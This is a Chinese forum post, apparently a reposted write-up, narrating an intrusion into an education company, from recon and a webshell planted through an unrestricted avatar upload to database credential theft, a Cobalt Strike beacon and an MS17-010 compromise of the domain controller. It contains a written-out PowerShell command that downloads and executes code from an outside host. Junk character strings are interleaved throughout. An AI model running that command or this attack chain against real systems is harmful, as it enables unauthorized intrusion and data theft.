|
: F% g6 H% G) K% c7 c* P 这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路
7 M; e. a' H* M9 e . O# E9 b+ I& m$ M( l" f
* N8 Q1 m9 S/ U6 S
4 p% `2 i1 q6 D6 F! C6 X 6 J _' y5 u5 G$ _! s n2 \& J6 V
' e& w$ e9 f$ }% p2 \+ _
正文* m3 l* g$ w) `' D5 H
8 G: z) A8 e( ?% a, f6 q) R
* \; b1 j# Q6 t: e 3 ^7 l* Z8 K8 ^1 ^; G9 T
% k0 Q6 f' G( {. q! Y p
3 y7 A7 g2 t7 {5 h9 t 目标:www.xxxx.com(一家教育机构)
1 P5 Z' D# n0 a1 u$ {, F打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能
' z; r& X# U M$ Y9 Q( b7 ^. `3 h- }
% n! S ]0 i/ |- p' ~5 S* a4 {& ?
8 V0 _( f/ X2 q# L! X8 p  # a1 Z# ` T. P, U$ f/ E
1 ^- |, o [* ]: a h ?! c( s- h' y! I
进行了简单的信息搜集
$ H1 o. C7 d9 j( q* l# T4 e
1 D: {1 W) h4 `, }7 s: W* {: j3 n; P' G
4 U% w* Y3 |% Z6 T4 J d. r* }: \
0 V) P2 V4 H# {' D0 L 子域名搜集
; q1 R7 L: Z, q5 y; v2 D! M) H+ S( S ' S; T6 X' ]; N4 \
# s* B. T3 J' [6 o: G* [6 ]
 2 H6 T4 | |: Q
" x( D+ f! Z1 w4 B/ j+ j1 g; R' O
# f, g3 b) Q! X( K/ j3 v3 | fofa找资产
% |8 w, R+ Z; P' k- Y. m! t# x. Z
' q+ a* d4 p) n; A/ c( e( Y8 ~( i- v- X( Q2 [& a
; f% t: p+ q4 }% L
6 Z' |9 M' K5 L 
! }' P$ A5 _# F. }$ L
! [9 M3 z* C- r' G Z* i& S6 p- j( T; k, [3 K
一共七个资产。去重之后只有两个。
' d! w1 ]& _- K7 ]+ Q( F
6 R6 k5 {3 D6 b6 Z0 B+ T& d: R
! L; Z1 @ K& J3 D% E+ _) v: V
* Z9 m9 @. o+ }' X3 ] ?. v( C( R- D$ f8 w/ b
目录探测
" Q; ~& {- O7 a( ]7 k3 @
, @. X# B0 m6 t! w) _- @
4 o8 U5 K6 b" @" @  ) I7 |, A1 B3 ^0 a$ ]* M* V5 L! E
7 }& U; [% ]/ l4 W+ @
2 [; c4 F3 `: O2 A3 f* u4 b* X 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
' H3 R% s- ^- ]1 Q) |, s: F
, P7 f6 q. q8 j" l% G/ x" P3 V
. s" z' \7 v- g) a. w
2 P3 ?7 M% I8 B5 ^3 Q8 g' Y
( h9 e6 j' Z6 e% p8 G: ] 我又尝试了通过修改返回包来绕过登录界面
8 E6 ]" h% [& Z2 Y1 ?
1 u9 s# x, j' u( f# S Y+ b8 X' p1 @+ A' A6 K- [
 0 P6 `' a9 U$ z8 Z \: u9 M
0 G" _( X5 h$ d+ Y6 T- T( {/ E. Y% m3 _; ?' W, L, s
还是不行,尝试注入无果' M+ r3 k; C. Y
8 q8 i1 i3 j4 Y! [5 e
3 M( X' P7 |+ E
0 E* \" X, e9 d7 u4 s+ z9 A 5 A! k; J$ \1 ?( I/ E' u. B$ r, w
, F" z+ j" o0 ?: m5 s8 M8 \ 不过我目录探测出了一处Spring信息泄露
# }: N7 Y; ?" F9 ^
# S% b* U% t4 d
' n3 x1 s2 E- g
2 `$ ]' p; h! I% z7 D9 u3 h4 U
( Y6 m, [% F: W# q" {
 0 A6 f' V5 {- g ^) q- c
, l) L+ ?$ Z6 \- n. X# [
6 v3 o$ O3 E7 W" I. o& S7 K* o% w
尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录
" t/ V3 U: P, {' n1 t1 ~# K ( P/ Q/ Y& P2 c. ^
$ O" g$ {) t4 i/ W; F: x& E+ p 
# M& g: |% f& F$ e4 z" u - r" H7 J% ~5 [0 x/ B9 P: S I& D
7 F7 z( {: S( S 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。
' j. v) K V' d, k( D* r " l7 G+ E$ i3 g! d3 {) a! V
. y2 z5 m6 K$ ~+ K4 I  5 q0 h% }9 v' |) e" D
, V: _8 T6 Q5 s O$ ~) C5 {! T
6 ]2 H$ G0 Q/ z5 R6 _! N
获取有些师傅到这一步就手机抓包电脑测了。8 J/ Z3 @ Y& A Q+ X
/ \$ |. m" R) S4 v8 l- v: P, d
, {& K# j4 E* D! w! u Q& Q- q/ m/ a Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。, I+ W5 v/ ~3 @# N1 @
$ n% n$ C$ X2 M, ]/ Q
C9 y. x4 ?- Y4 Z b, y1 f 其中在一个公众号发现了小程序,可以进行注册。
/ @ O8 J( t- [& H0 x8 k& m , ^# J. W& R( B" V. H$ Z7 s
% l% }7 M8 C( H# @9 Y4 f8 L
看到了头像上传,尝试上传获取WebShell8 w* J6 \" Q3 X# B
* Q6 y9 ?+ P* r \ R* B/ N
! d9 M7 ~7 m8 {- R 
2 Q; Y6 q% s% p+ @0 C- r
4 F' \5 u; A/ ]' M) t g+ T# M5 a9 z5 t7 {) {& v* R
未做任何限制成功GetShell,上了冰蝎马,目录没权限访问7 K5 O: s. L4 g- B* Z; a
- v" }9 C+ Z3 w \: k* N5 r3 L* j. A" z
! |9 S+ @4 x* x6 k " v) G1 o, b) r" l
" H$ S: i' I) b) w2 l
然后上了大马" |- W- J( V1 P& ^4 J5 O
1 p0 _, w) [' V
2 t+ s& j5 J5 Y8 x. f/ J  $ U; C/ _& j8 q3 J: o( j! M) F
0 L$ N' o4 \+ Z* \* B) [6 r
. M/ G. B t! b+ W C  - Y! s: k6 q4 l' v0 q
/ a. H1 V; J0 e# c& h( ]2 D, w- v: g( r9 e! @3 ^* u5 c9 N
通过翻找文件发现数据库账号密码+ A4 { W* n, `* D
0 U) P" f' e4 X5 Q* U1 N" C0 q
# z4 t/ n M3 D4 I9 p5 R2 o8 m
 7 r8 W% o* f) p. O$ v5 s
% {* C, b0 y, w8 P0 V9 j0 }" E+ P+ {) Q) v* ~* u* Y
--内网渗透
7 i- i) ~. O/ }; ]/ y. q6 j! h) L I% { + F! `0 R$ A% u& S5 s- X
3 L4 o. h h" [1 m( r" v4 G: q
直接通过powershell执行 cs上线, ^( _% U( p4 S& T1 ?3 [9 J
# c& W" e g1 m( u8 u, E$ ?+ X' N3 U3 z2 M: N: C8 E" ?
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"6 s. w# m6 D7 [: A
. d) k1 m1 g; u/ a
& T6 n1 Y% ~/ f8 T i 
$ U" L4 y) A y6 m& {' p+ G4 |
* S' u3 c2 b1 C* P4 }- }8 {, F- Z/ W4 \( R1 r" ?# t+ p( V
进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破
0 t' ~9 m# l5 D- O : Z' d; t) F( R" i- Z
; L4 x- \( z! j3 l! D! y  . y3 v" h7 j: }0 c6 m, V1 L) q
8 }: O, G' l8 i F' O( K+ s! C8 Z8 H- d3 K7 L
登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
V, Z, V' {+ b& V( K' O" k
" v; W' {" z, j
* u8 U; O: J M8 |1 K
# P% [* G+ i$ a
! t! {2 }6 ^# C& C7 |& v
8 V0 t* C9 A! ]% T9 d! f' S  4 }9 z* |$ u# c
" c% |4 R/ f3 x* `
3 r) {1 B* r' W/ i9 ~, r" ` 通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
. j* s! \' m2 r; C
- v* W8 o0 F" z+ v) A4 D7 N3 [7 w
( Z6 F7 h1 x6 n9 b6 G6 Y7 W% G
8 X' l w' j& O0 J" a! P# R8 R' S3 o
& h0 l$ O% G* T% q% m1 Z  , K' o) |6 W+ o9 w
/ T6 Q! [+ h" p8 g& H
( h) H* s" A0 g
- e# H8 b2 L0 I8 N, ^, [
9 I* V6 C6 Q. W2 l
" v) a9 }; w% W D
' f7 n& j/ x' H6 h3 o3 N6 N6 j8 ?/ t. Y
; n$ a: L3 e ~ v; g6 Y3 J y: }
& H* o$ _& ~& D) k! k* E- A- s9 `8 j+ f' }- Y; I+ j$ t( G D, S
小结
; ^+ u) O9 v) L, y6 D: k
4 [4 ~! t* ? r# m5 m
3 Q' ^. F1 ~9 s6 b4 e( C6 F3 m . d; O$ E0 G& Q6 o' \
3 v" C! w4 r: q/ B1 D
" L* K0 Z* U; i. ? 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!
7 W% e* ^4 k, |7 S, ^# T. G
4 K. S+ M% S! i8 N' g: N& c" G" r
1 o: \+ T1 @' W( D9 x . Z/ c! c+ k( [+ p
6 p' W) D) E8 f5 T J5 q
+ r3 X$ z3 k, u3 U5 @1 O8 ~
- ; P% H u1 D9 w+ u* w
: I6 \- d% v. D. y$ E
5 C5 K( p0 ^' \1 T1 E
- & g' M3 E3 M* w# E7 m3 {& m
" \4 }8 ~) g1 l" N. |4 f
/ v( R8 Z# M. i8 Q0 s+ Q! @3 F
# w, J: y, R* b6 r# e ]9 @: |/ }4 d: g5 t$ x2 H$ m
作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html
! q. v: P3 h2 p' [4 l! y9 x % D. u V* s% u% v1 r' ^
$ Q3 r2 c7 Q8 N& A$ n4 w
: H/ c" i% w+ Z; P | 
发表于 2024-3-1 19:41:32
收藏
支持
反对